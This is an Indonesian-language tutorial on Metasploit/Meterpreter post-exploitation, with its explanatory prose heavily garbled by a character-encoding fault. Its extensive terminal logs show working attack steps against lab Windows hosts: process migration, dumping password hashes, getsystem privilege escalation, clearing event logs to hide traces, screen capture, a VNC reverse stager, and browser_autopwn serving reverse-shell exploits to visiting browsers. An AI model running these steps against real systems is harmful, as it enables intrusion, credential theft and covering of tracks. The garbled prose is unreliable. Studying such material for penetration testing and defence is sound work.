$B%.$.A.$.* &a# a%a-at tar$etA!icti- $B%.$.A.$.% &e#$a# 2,rt $>AA. Meter2reter
&a2at -e-/.ka &iri#"a se/a#"ak -.#$ki# ses.ai &e#$a# !icti- "a#$ te%ah
-e#$akses /ack&,,r &a# se/a#"ak %iste#er "a#$ te%ah &i -.%ai 2a&a /ack$r,.#& @
+; B .
Se/a$ai c,#t,h sa"a -e-.%ai exploit multi handler se/a#"ak ' ka%i 2a&a
/ack$r,.#& &e#$a# 2,rt /er/e&a > "ait. 2,rt )))) &a# 2,rt ****. Ketika sa%ah sat.
!icti- -e#$akses /ack&,,r &e#$a# &esti#asi 2,rt 3333 ter/.ka%ah sessi,# 1 &a#
k,r/a# "a#$ %ai# &e#$a# h,st /er/e&a -e#$akses /ack&,,r &e#$a# 2,rt 5555 aka#
-e-/.at sessi,# /ar. -aka terhit.#$ se/a$ai sessi,#s '
Kita &a2at -e%ihat sessi,#ssessi,#s "a#$ ter/.ka &e#$a# -e#$etika# 2eri#tah
IsessionsJ.
(#t.k -e-i%ih sessions ter/.ka "a#$ he#&ak kita e12%,itasi %e/ih %a#j.t> kita ti#$$a%
-e#$$.#aka# 2eri#tah Isessions 6i M id ;I Se/a$ai c,#t,h sa"a aka# -e-/.ka
sessions 1
Maka meterpreter command prompt aka# ter/.ka> /erarti e12%,it sia2 &iesek.si.
*.%. e/i2at 6roses ber;a/an
(#t.k -e%ihat 2r,ses /erja%a# 2a&a -esi# tar$et> kita $.#aka# 2eri#tah IpsJ &i-a#a
,.t2.t -eter2reter aka# -e#a-2i%ka# i#+,r-asi 2r,ses &e#$a# PID> na5a 6roses8
Arc2 8 sessions8 User> serta Pat2 .
*.9. e/i2at isi direktori
(#t.k -e%ihat isi &irekt,ri kita /isa -e#$$.#aka# 2eri#tah %i#.1 IlsJ &a# 2i#&ah ke
&irekt,ri &e#$a# 2eri#tah IcdJ &a2at sa"a a-/i% kesi-2.%a# -eter2reter -e#$a&,2si
2eri#tah2eri#tah .#i1 .#t.k 2e#$,2erasia##"a.
*.). i1rate ke 6roses tertent4
(#t.k -i$rati#$ ke 2r,ses terte#t. &e#$a# t.j.a# 2e#"a-ara# -aka kita
-e#$$.#aka# 2eri#tah -i$rati#$ &e#$a# +,r-at
migrate [ id proses
4r,ses i& kita &a2atka# 2a&a 2eri#tah 2s "a#$ s.&ah &i /ahas se/e%.-#"a. Ya#$
2a%i#$ seri#$ &i%ak.ka# migrating a&a%ah 2a&a 2r,ses e<6/orer.e<e.
meterpreter + migrate 123&
[- 4igrating to 123&...
[- 4igration completed successfull5.
*.*. Down/oad dan 46/oad ke direktori 5esin tar1et
(#t.k -e#&,<#%,a& ses.at. 2a&a &irekt,ri tar$et -aka $.#aka# +,r-at &i /a<ah
i#i>
meterpreter > download [ path/dir]
meterpreter > ls
Listing: c:\
============
Mode Size Type Last modified
Name
---- ---- ---- -------------
----
100777/rwxrwxrwx 0 fil 2012-02-23 01:58:02 +0700
AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2012-02-23 01:58:02 +0700
CONFIG.SYS
40777/rwxrwxrwx 0 dir 2012-02-22 11:03:17 +0700
Documents and Settings
100444/r--r--r-- 0 fil 2012-02-23 01:58:02 +0700
IO.SYS
100444/r--r--r-- 0 fil 2012-02-23 01:58:02 +0700
MSDOS.SYS
100666/rw-rw-rw- 69081 fil 2012-02-22 11:08:51 +0700
NETCAT.C
100555/r-xr-xr-x 47564 fil 2004-08-04 02:38:34 +0700
NTDETECT.COM
40555/r-xr-xr-x 0 dir 2012-03-06 08:09:25 +0700
Program Files
40777/rwxrwxrwx 0 dir 2012-02-23 02:02:27 +0700
System Volume Information
40777/rwxrwxrwx 0 dir 2012-03-05 17:10:19 +0700
WINDOWS
100666/rw-rw-rw- 211 fil 2012-02-23 01:52:37 +0700
boot.ini
100666/rw-rw-rw- 12039 fil 2012-02-22 11:08:51 +0700
doexec.c
100666/rw-rw-rw- 7283 fil 2012-02-22 11:08:51 +0700
generic.h
100666/rw-rw-rw- 22784 fil 2012-02-22 11:08:51 +0700
getopt.c
100666/rw-rw-rw- 4765 fil 2012-02-22 11:08:51 +0700
getopt.h
100666/rw-rw-rw- 61780 fil 2012-02-22 11:08:51 +0700
hobbit.txt
100666/rw-rw-rw- 544 fil 2012-02-22 11:08:51 +0700
makefile
100777/rwxrwxrwx 59392 fil 2012-02-22 11:08:51 +0700
nc.exe
100444/r--r--r-- 250032 fil 2004-08-04 02:59:34 +0700
ntldr
100666/rw-rw-rw- 301989888 fil 2012-03-05 18:04:50 +0700
pagefile.sys
100666/rw-rw-rw- 7070 fil 2012-02-22 11:08:51 +0700
readme.txt
meterpreter > download C:\\nc.exe
[*] downloading: C:\nc.exe -> nc.exe
[*] downloaded : C:\nc.exe -> nc.exe
(#t.k -e#$.2%,a& +i%e 2a&a -esi# tar$et $.#aka# 2eri#tah &e#$a# +,r-at
&i /a<ah i#i
meterpreter + upload [file [dire0tori-tu,uan
Se/a$ai c,#t,h sa"a -e#$.2%,a& +i%e nc.e<e ke direktori E &ari siste- tar$et.
meterpreter > upload nc.exe E:\\
[*] uploading : nc.exe -> E:\
[*] uploaded : nc.exe -> E:\\nc.exe
meterpreter > cd E:\\
meterpreter > ls
Listing: E:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 1980-01-01 15:00:00 +0700 .
40777/rwxrwxrwx 0 dir 1980-01-01 15:00:00 +0700 ..
100777/rwxrwxrwx 59392 fil 2012-03-05 19:03:43 +0700 nc.exe
100777/rwxrwxrwx 73802 fil 2012-03-05 18:08:17 +0700 zee-
reverse-1.exe
reverse-shell-meterpreter.exe
reverse-shell.exe
100777/rwxrwxrwx 73802 fil 2012-03-05 16:56:25 +0700
zeeganteng.exe
*... e/i2at in3or5asi network tar1et.
(#t.k -e%ihat i#+,r-asi -e#$e#ai #et<,rk 2a&a tar$et ke-/a%i kita $.#aka#
2eri#tah %i#.1 @ ipconfig B
*.&. e/i2at 4ser id ? 1et4id @
Jika kita he#&ak -e%ihat .ser &i-a#a -eter2reter terk,#eksika# kita $.#aka#
2eri#tah IgetuidJ
meterpreter > getuid
Server username: IBTEAM-51E6FAEC\target
*.A. en1esek4si 6ro1ra5 ata4 3i/e tertent4
(#t.k -e-esek.si 2r,$ra- ata. +i%e terte#t. 2a&a -eter2reter $.#aka# s"#ta1
execute -f [ dir path file ]
meterpreter > cd Mozilla\ Firefox
meterpreter > ls
Listing: C:\Program Files\Mozilla Firefox
=========================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2012-03-05 19:36:59 +0700 .
40555/r-xr-xr-x 0 dir 2012-03-05 19:36:58 +0700 ..
100666/rw-rw-rw- 19416 fil 2012-02-16 21:40:41 +0700
AccessibleMarshal.dll
100666/rw-rw-rw- 2106216 fil 2012-02-16 17:42:54 +0700
D3DCompiler_43.dll
100666/rw-rw-rw- 1869 fil 2012-02-16 17:42:53 +0700
Microsoft.VC80.CRT.manifest
100666/rw-rw-rw- 2157 fil 2012-02-16 17:42:54 +0700
application.ini
100666/rw-rw-rw- 11678 fil 2012-02-16 17:42:54 +0700 blocklist.xml
100666/rw-rw-rw- 36 fil 2012-02-16 17:43:21 +0700
chrome.manifest
40777/rwxrwxrwx 0 dir 2012-03-05 19:37:03 +0700 components
100666/rw-rw-rw- 583 fil 2012-02-16 17:42:57 +0700
crashreporter-override.ini
100777/rwxrwxrwx 125912 fil 2012-02-16 21:40:41 +0700
crashreporter.exe
100666/rw-rw-rw- 3803 fil 2012-02-16 17:42:57 +0700
crashreporter.ini
100666/rw-rw-rw- 1998168 fil 2012-02-16 17:42:54 +0700 d3dx9_43.dll
40777/rwxrwxrwx 0 dir 2012-03-05 19:37:03 +0700 defaults
100666/rw-rw-rw- 130 fil 2012-02-16 17:42:53 +0700
dependentlibs.list
40777/rwxrwxrwx 0 dir 2012-03-05 19:37:03 +0700 dictionaries
40777/rwxrwxrwx 0 dir 2012-03-05 19:37:03 +0700 extensions
100777/rwxrwxrwx 924632 fil 2012-02-16 21:40:41 +0700 firefox.exe
100666/rw-rw-rw- 478 fil 2012-02-16 21:40:41 +0700 freebl3.chk
100666/rw-rw-rw- 269272 fil 2012-02-16 21:40:41 +0700 freebl3.dll
100666/rw-rw-rw- 22166 fil 2012-03-05 19:37:08 +0700 install.log
40777/rwxrwxrwx 0 dir 2012-03-05 19:37:03 +0700 jsloader
100666/rw-rw-rw- 97240 fil 2012-02-16 21:40:41 +0700 libEGL.dll
100666/rw-rw-rw- 437208 fil 2012-02-16 21:40:41 +0700
libGLESv2.dll
100666/rw-rw-rw- 15832 fil 2012-02-16 21:40:41 +0700 mozalloc.dll
100666/rw-rw-rw- 1911768 fil 2012-02-16 21:40:41 +0700 mozjs.dll
100666/rw-rw-rw- 801752 fil 2012-02-16 21:40:41 +0700
mozsqlite3.dll
100666/rw-rw-rw- 45016 fil 2012-02-16 21:40:41 +0700 mozutils.dll
100666/rw-rw-rw- 479232 fil 2012-02-16 17:42:53 +0700 msvcm80.dll
100666/rw-rw-rw- 548864 fil 2012-02-16 17:42:54 +0700 msvcp80.dll
100666/rw-rw-rw- 626688 fil 2012-02-16 17:42:54 +0700 msvcr80.dll
100666/rw-rw-rw- 187352 fil 2012-02-16 21:40:41 +0700 nspr4.dll
100666/rw-rw-rw- 646104 fil 2012-02-16 21:40:41 +0700 nss3.dll
100666/rw-rw-rw- 371672 fil 2012-02-16 21:40:41 +0700 nssckbi.dll
100666/rw-rw-rw- 478 fil 2012-02-16 21:40:41 +0700 nssdbm3.chk
100666/rw-rw-rw- 109528 fil 2012-02-16 21:40:41 +0700 nssdbm3.dll
100666/rw-rw-rw- 105432 fil 2012-02-16 21:40:41 +0700 nssutil3.dll
100666/rw-rw-rw- 7388884 fil 2012-02-16 17:43:21 +0700 omni.ja
100666/rw-rw-rw- 142 fil 2012-02-16 17:42:54 +0700 platform.ini
100666/rw-rw-rw- 22488 fil 2012-02-16 21:40:41 +0700 plc4.dll
100666/rw-rw-rw- 20952 fil 2012-02-16 21:40:41 +0700 plds4.dll
100777/rwxrwxrwx 16856 fil 2012-02-16 21:40:41 +0700 plugin-
container.exe
100666/rw-rw-rw- 1622 fil 2012-02-16 17:43:24 +0700 precomplete
100666/rw-rw-rw- 35341 fil 2012-02-16 16:07:22 +0700 removed-files
40777/rwxrwxrwx 0 dir 2012-03-05 19:37:03 +0700
searchplugins
100666/rw-rw-rw- 105432 fil 2012-02-16 21:40:41 +0700 smime3.dll
100666/rw-rw-rw- 478 fil 2012-02-16 21:40:41 +0700 softokn3.chk
100666/rw-rw-rw- 170968 fil 2012-02-16 21:40:41 +0700 softokn3.dll
100666/rw-rw-rw- 154584 fil 2012-02-16 21:40:41 +0700 ssl3.dll
40777/rwxrwxrwx 0 dir 2012-03-05 19:37:08 +0700 uninstall
100666/rw-rw-rw- 6 fil 2012-02-16 17:42:53 +0700 update.locale
100777/rwxrwxrwx 269272 fil 2012-02-16 21:40:41 +0700 updater.exe
100666/rw-rw-rw- 707 fil 2012-02-16 17:42:53 +0700 updater.ini
100666/rw-rw-rw- 19928 fil 2012-02-16 21:40:41 +0700 xpcom.dll
100666/rw-rw-rw- 16116696 fil 2012-02-16 21:40:42 +0700 xul.dll
meterpreter > execute -f firefox.exe -i -H
Process 1416 created.
Channel 3 created.
Maka ketika sa"a -e#$ecek 2r,ses r.##i#$ 2a&a ser!er tar$et > -e-a#$ a&a 2r,ses
+ire+,1 &isa#a &e#$a# kata %ai# firefox bro0ser 2a&a -esi# tar$et te%ah ter/.ka &a#
r.##i#$ via remote meterpreter
meterpreter > ps
Process list
============
PID Name Arch Session User
Path
--- ---- ---- ------- ----
----
0 [System Process]
4 System x86 0
232 firefox.exe x86 0 IBTEAM-51E6FAEC\target
C:\Program Files\Mozilla Firefox\firefox.exe
484 smss.exe x86 0 NT
AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
584 csrss.exe x86 0 NT
AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
608 winlogon.exe x86 0 NT
AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
652 services.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\services.exe
664 lsass.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\lsass.exe
820 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\svchost.exe
940 svchost.exe x86 0
980 alg.exe x86 0
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\System32\svchost.exe
1336 wscntfy.exe x86 0 IBTEAM-51E6FAEC\target
C:\WINDOWS\system32\wscntfy.exe
1528 explorer.exe x86 0 IBTEAM-51E6FAEC\target
C:\WINDOWS\Explorer.EXE
1556 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\spoolsv.exe
1668 VBoxTray.exe x86 0 IBTEAM-51E6FAEC\target
C:\WINDOWS\system32\VBoxTray.exe
*.B. e5b4ka s2e//
Me-i#&ahka# 2r,ses -eter2reter ke she%% &e#$a# -e-/.ka c,--a#& 2r,-2t &a#
-e-as.ki she%% s"ste- -esi# tar$et> -as.ka# 2eri#tah IshellJ 2a&a c,--a#&
2r,-2t -eter2reter.
Attacker -.#$ki# he#&ak -e#$$.#aka# 2eri#tah2eri#tah 0indo0s shell @ c5d B
.#t.k -e#$.#aka# e12%,ite12%,it terte#t.. (#t.k ke%.ar &ari she%% &a# ke-/a%i ke
meterpreter command prompt ketika# e1it 2a&a she%% c,--a#& 2r,-2t.
*.$>. User Id/eti5e
Biasa#"a .#t.k -e-astika# /ah<a .ser tar$et ti&ak /era&a ata. -e#$$.#aka#
-esi# > attacker -e-eriksa i&%eti-e. Idletime a&a%ah .k.ra# <akt. .ser ti&ak
-e#$.#aka# akti!itas a2a2.#. Sehi#$$a attacker -e#$etah.i &e#$a# 2asti /ah<a
.ser ti&ak /era&a &i &e2a# -esi# > sehi#$$a attacker &a2at -e#$e12%,itasi 2r,ses
#,#/ack$r,.#& -esi# tar$et &e#$a# /e/as. G.#aka# 2eri#tah IidletimeJ sehi#$$a
-eter2reter aka# -e#.#j.ka# i#+,r-asi i&%eti-e &e#$a# +,r-at <akt.
@ hariAja-A-e#itA&etik B.
meterpreter > idletime
User has been idle for: 12 mins 8 secs
*#+,r-asi &i atas /erarti .ser tar$et ti&ak -e%ak.ka# akti+itas a2a2.# se%a-a 1'
-e#it 9 &etik.
*.$$. Has2d456
Sa%ah sat. a/i%itas &ari -etas2%,it a&a%ah IhashdumpJ &i-a#a kita &a2at -e%ihat
2ass<,r& .ser "a#$ -asih tere#skri2si. Me#$$.#aka# +asi%itas i#i -e-a#$ 2er%.
2e-aha-a# "a#$ /aik -e#$e#ai privilege proses 2a&a <i#&,<s. 4eri#tah ImigrateJ
ata. 2r,ses -i$rati#$ > a$ak#"a sa#$at -e-/a#t. 2r,ses i#i. Mi$rate ke 2r,ses
terte#t. aka# -e#$a-/i% .ser 2ri!i%a$e terte#t. sehi#$$a kita &a2at -e#$$.#aka#
hash&.-2. C,#t,h#"a sa"a -i$rate ke 2r,ses i& explorer1exe.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY
ecf2f96a03d5599394ccd459b7b1e429...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError
stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint:
migrate into service process)
Masih $a$a%> ke#a2a K Seka%i %a$i kare#a 2ri!i%a$e .ser "a#$ a#&a $.#aka# -asih
/e%.- -e#&a2at 2er-issi,# E 2er-iss,# terte#t. 2a&a a&-i#istrasi +i%e &a# 2r,ses
-esi# tar$et. Kare#a it. sa"a -e#c,/a -i$rati#$ ke 2r,ses %ai##"a.
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
232 firefox.exe x86 0 IBTEAM-51E6FAEC\target
C:\Program Files\Mozilla Firefox\firefox.exe
484 smss.exe x86 0 NT AUTHORITY\SYSTEM
\SystemRoot\System32\smss.exe
584 csrss.exe x86 0 NT
AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
608 winlogon.exe x86 0 NT
AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
652 services.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\services.exe
664 lsass.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\lsass.exe
708 logon.scr x86 0 IBTEAM-51E6FAEC\target
C:\WINDOWS\System32\logon.scr
820 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\VBoxService.exe
980 alg.exe x86 0
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\System32\svchost.exe
1336 wscntfy.exe x86 0 IBTEAM-51E6FAEC\target
C:\WINDOWS\system32\wscntfy.exe
1528 explorer.exe x86 0 IBTEAM-51E6FAEC\target
C:\WINDOWS\Explorer.EXE
1556 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM
C:\WINDOWS\system32\spoolsv.exe
1668 VBoxTray.exe x86 0 IBTEAM-51E6FAEC\target
C:\WINDOWS\system32\VBoxTray.exe
meterpreter > migrate 652
[*] Migrating to 652...
[*] Migration completed successfully.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY
ecf2f96a03d5599394ccd459b7b1e429...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d
7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
HelpAssistant:1000:333d83d6186d9883cf31f1d7d3a6e5d8:3ab6dcece25fd70533cf4
986647e2464:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c8c9ac93b918fedb036
377fc5e5fb936:::
target:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c08
9c0:::
*.$$. Pri=i/a1e Esca/ation
Me#$a-/i% a.t,ritas .ser terti#$$i 2a&a s"ste- <i#&,<s /iasa#"a ter$a#t.#$ &ari
-i$rati#$ kita ke 2r,ses2r,ses !ita% "a#$ &ija%a#ka# ,%eh .ser.ser /er2ri!i%a$e
s"ste-. Sehi#$$a 2e-aha-a# kita terha&a2 2r,ses2r,ses "a#$ /erja%a# 2a&a siste-
tar$et -e-a#$ &i /.t.hka#. Se/a$ai sa%ah sat. c,#t,h sa"a /erhasi% -e#$a-/i%
2ri!i%a$e s"ste- a.t,rit" 2a&a -esi# tar$et.
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
*.$%. en12a64s /o1
(#t.k ti&ak -e#i#$$a%ka# jejak terte#t. /iasa#"a attacker aka# -e#$ha2.s
%,$%,$ terte#t. 2a&a -esi# tar$et. Ha% i#i &i%ak.ka# &e#$a# -e-a#+aatka#
Iscripts!meterpreterJ. Se/e%.- sa"a -e#$ha2.s %,$%,$ 2a&a siste- tar$et
sa"a -e#$ecek siste- e!e#t @ %,$ B "a#$ a&a 2a&a -esi# tar$et. Kare#a
se/a$ai c,#t,h sa"a -e#$$.#aka# tar$et &e#$a# siste- ,2erasi <i#&,<s
12. Maka sa"a -e%ihat e!e#t %,$ 2a&a siste- tar$et se/e%.- &i %ak.ka#
2e-/ersiha# %,$.
Ke-.&ia# .#t.k -e#$ha2.s log6log terse/.t > kita /isa -e-a#$$i% shell irb .#t.k
-e%ak.ka# esek.si scri2t.
Ke-.&ia# sa"a ke-/a%i -e#$ecek 2a&a e!e#t !ie<er > ter#"ata s.kses
*.$9. Screenca6t4re
Es6ia a&a%ah sa%ah sat. e1te#si -eter2reter .#t.k -e%ak.ka# scree# ca2t.re serta
-e#&,<#%,a&#"a &ari ta-2i%a# &eskt,2 k,r/a#. G.#aka# 2eri#tah es2ia
meterpreter > use espia
Loading extension espia...success.
Ke-.&ia# &i%a#j.tka# &e#$a# 2eri#tah
meterpreter > screengrab
Screenshot saved to: /root/vsHpYzSI.jpeg
4erhatika# hasi% ,.t2.t &iatas> -eter2reter aka# -e#&,<#%,a& &a# -e#"i-2a# hasi%
scree# ca2t.re 2a&a siste- tar$et &i &irekt,ri r,,t &e#$a# #a-a =sH6:PSI.;6e1
*.$). (NC Re5ote Deskto6
Me%ak.ka# re-,te &eskt,2 &e#$a# VNC a&a%ah %a#$kah "a#$ sa#$at -.&ah. Jika
2ri!i%a$e s.&ah /e#ar &a# /aik > /iasa#"a -e-a#$$i% ekste#si i#i /.ka#%ah ha% "a#$
s.%it /.at attacker. Kare#a -eter2reter s.&ah &i%e#$ka2i &e#$a# i#te$ritas a.t,
.2%,a& !#c ser!er ke -esi# tar$et.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.5
LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to
C:\DOCUME~1\target\LOCALS~1\Temp\NQuNji.exe (must be deleted
manually)
[*] Executing the VNC agent with endpoint 192.168.1.5:4545...
4erhatika# 2r,ses &i atas> &i-a#a !#c -e#$.2%,a& VNC a$e#t /ack&,,r &e#$a# #a-a
NV4N;i.e<e 2a&a &irekt,ri C:\DOCUME~1\target\LOCALS~1\Temp\ &a#
-e#$esek.si#"a. Sehi#$$a !#c ser!er ter/.ka 2a&a -esi# tar$et &a# -e-/.ka Ti12t(NC
c/ient 2a&a sisi attacker.
.. ETASP'OIT "RO!SER AUTOP!N
Mets2%,it /r,<ser a.t,2<# a&a%ah sa%ah sat. -.%ti e12%,it "a#$ aka# -e-/.at
/a#"ak ,2si -e%a%.i /r,<ser @ 6ort A> B &e#$a# as.-si tar$et aka# -e#$akses url
attacker host.
..$. Conto2 seran1an
root@eichel:~# /opt/framework/msf3/msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+

=[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 811 exploits - 452 auxiliary - 135 post
+ -- --=[ 247 payloads - 27 encoders - 8 nops
=[ svn r14862 updated today (2012.03.05)
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for
reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming
connections
SSLCert no Path to a custom SSL
certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that
should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit
(default is random)
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2012-03-06 00:48:02 +0700
msf auxiliary(browser_autopwn) > [*] Done in 1.187645 seconds
[*] Starting exploit modules on host 192.168.1.5...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload
generic/shell_reverse_tcp
[*] Using URL: http://192.168.1.5:80/pBQJYsCX
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload
java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.5:80/wzcqI
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload
java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.5:80/GuXhBCATQ
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload
[*] Using URL: http://192.168.1.5:80/sNfWj
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload
[*] Using URL: http://192.168.1.5:80/XPauDaFZyZ
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload
[*] Using URL: http://192.168.1.5:80/kNuB
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload
[*] Using URL: http://192.168.1.5:80/rQkfA
[*] Server started.
[*] Starting exploit osx/browser/mozilla_mchannel with payload
[*] Using URL: http://192.168.1.5:80/xuEf
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload
[*] Using URL: http://192.168.1.5:80/NXMNQfKwrSLD
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with
payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.5:80/OVzsmnRmEKkr
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload
windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.5:80/WlkDqKMvIYM
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with
[*] Using URL: http://192.168.1.5:80/FYzw
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with
[*] Using URL: http://192.168.1.5:80/wMtF
[*] Server started.
[*] Starting exploit windows/browser/enjoysapgui_comp_download with
[*] Using URL: http://192.168.1.5:80/woDsV
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload
[*] Using URL: http://192.168.1.5:80/HLmTHnjV
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with
[*] Using URL: http://192.168.1.5:80/nsGyZE
[*] Server started.
[*] Starting exploit windows/browser/mozilla_mchannel with payload
[*] Using URL: http://192.168.1.5:80/UwCUoPvxAi
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload
[*] Using URL: http://192.168.1.5:80/DvtuMhiOuvuD
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload
[*] Using URL: http://192.168.1.5:80/zSoNI
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload
[*] Using URL: http://192.168.1.5:80/EOpRaVPw
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload
[*] Using URL: http://192.168.1.5:80/GxRnfAa
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with
[*] Using URL: http://192.168.1.5:80/eICEgQJdqRg
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload
[*] Using URL: http://192.168.1.5:80/XLoMIPUB
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload
[*] Using URL: http://192.168.1.5:80/qIyKdZoLlC
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] --- Done, found 24 exploit modules
[*] Using URL: http://192.168.1.5:80/
[*] Server started.
[*] 192.168.1.11 Browser Autopwn request '/'
[*] 192.168.1.11 Browser Autopwn request '/?
sessid=TGludXg6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6Q2hyb21lOjE3LjAuOT
YzLjQ2Og%3d%3d'
[*] 192.168.1.11 JavaScript Report: Linux:undefined:undefined:en-
US:x86:Chrome:17.0.963.46:
[*] Responding with exploits
[*] Sun Java Calendar Deserialization Privilege Escalation handling
request from 192.168.1.11:54706...
[*] Payload will be a Java reverse shell to 192.168.1.5:7777 from
192.168.1.11...
[*] Generated jar to drop (5255 bytes).
[*] 192.168.1.11 Browser Autopwn request '/favicon.ico'
[*] 192.168.1.11 404ing /favicon.ico
[*] 192.168.1.11 404ing /favicon.ico
[*] Sun Java Calendar Deserialization Privilege Escalation sending
Applet.jar to 192.168.1.11:34253...
[*] Sun Java Calendar Deserialization Privilege Escalation sending
Applet.jar to 192.168.1.11:34254...
sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6M
y42Og%3d%3d'
[*] 192.168.1.16 JavaScript Report: Microsoft Windows:7:undefined:en-
US:x86:Firefox:3.6:
[*] 192.168.1.16 404ing /favicon.ico
[*] windows/browser/mozilla_nstreerange: Redirecting 192.168.1.16:49198
[*] 192.168.1.16 404ing /favicon.ico
[*] windows/browser/mozilla_nstreerange: Sending HTML to
192.168.1.16:49198
[*] 192.168.1.16 404ing /favicon.ico
[*] windows/browser/mozilla_nstreerange: Sending XUL to 192.168.1.16:49198
sessid=TGludXg6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6dW5kZWZpbmVkOnVuZG
VmaW5lZDo%3d'
